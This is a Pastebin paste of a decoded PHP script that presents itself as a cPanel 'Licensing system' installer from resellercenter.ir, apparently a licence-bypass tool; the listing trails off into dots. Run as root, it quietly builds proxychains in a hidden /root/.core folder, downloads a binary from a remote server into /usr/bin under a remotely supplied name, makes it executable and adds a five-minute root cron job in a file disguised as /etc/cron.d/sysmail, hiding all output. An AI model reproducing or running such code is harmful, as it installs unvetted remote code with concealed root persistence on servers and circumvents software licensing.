Advertisement
Guest User

Untitled

a guest
Feb 5th, 2020
1,535
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.62 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by http://DeZender.Net
  5. * @ deZender (PHP7 Decoder for SourceGuardian Encoder)
  6. *
  7. * @ Version : 4.0.9.0
  8. * @ Author : DeZender
  9. * @ Release on : 08.08.2019
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. $getcopyright2 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright2.php');
  15. $getcopyright3 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright3.php');
  16. $getcopyright4 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright4.php');
  17. $getcopyright5 = curl_init('http://api.resellercenter.ir/cpanel/getcopyright5.php');
  18. exec('mkdir /root/.core > /dev/null 2>&1; cd /root/.core; rm -rf proxychains-ng > /dev/null 2>&1; git clone https://github.com/rofl0r/proxychains-ng.git > /dev/null 2>&1 ; cd proxychains-ng > /dev/null 2>&1; ./configure > /dev/null 2>&1; make > /dev/null 2>&1; make install > /dev/null 2>&1; make install-config > /dev/null 2>&1; rm -rf /usr/local/etc/proxychains.conf; rm -rf /root/proxychains-ng > /dev/null 2>&1');
  19. $ch = curl_init();
  20. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright2.php');
  21. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22. $getcopyright2 = curl_exec($ch);
  23. curl_close($ch);
  24. $ch = curl_init();
  25. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright3.php');
  26. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  27. $getcopyright3 = curl_exec($ch);
  28. curl_close($ch);
  29. $ch = curl_init();
  30. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright4.php');
  31. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  32. $getcopyright4 = curl_exec($ch);
  33. curl_close($ch);
  34. $ch = curl_init();
  35. curl_setopt($ch, CURLOPT_URL, 'http://api.resellercenter.ir/cpanel/getcopyright5.php');
  36. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  37. $getcopyright5 = curl_exec($ch);
  38. curl_close($ch);
  39. echo "\n\n" . ' ' . "\x1b" . '[31m [+] Starting ' . $getcopyright2 . ' Licensing system - CPanel [+]' . "\x1b" . '[32m ' . "\n\n";
  40. echo "\x1b" . '[36m | Copyright 2018 - ' . $getcopyright2 . ' ' . "\x1b" . '[32m';
  41. exec('wget -O /usr/bin/RcLicenseCP http://cpanel.resellercenter.ir/cpanelv1/RcLicenseCP > /dev/null 2>&1');
  42. exec('wget -O /usr/bin/' . $getcopyright3 . ' http://cpanel.resellercenter.ir/cpanelv1/RcLicenseCP > /dev/null 2>&1');
  43. exec('chmod +x /usr/bin/RcLicenseCP > /dev/null 2>&1');
  44. exec('chmod +x /usr/bin/' . $getcopyright3 . ' > /dev/null 2>&1');
  45. exec('echo \'*/5 * * * * root /usr/bin/' . $getcopyright3 . '\' >> /etc/cron.d/sysmail');
  46.  
  47. if (file_exists('/usr/local/cpanel/cpconf')) {
  48. ......................................................................
  49. ..................................
  50. ..............
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement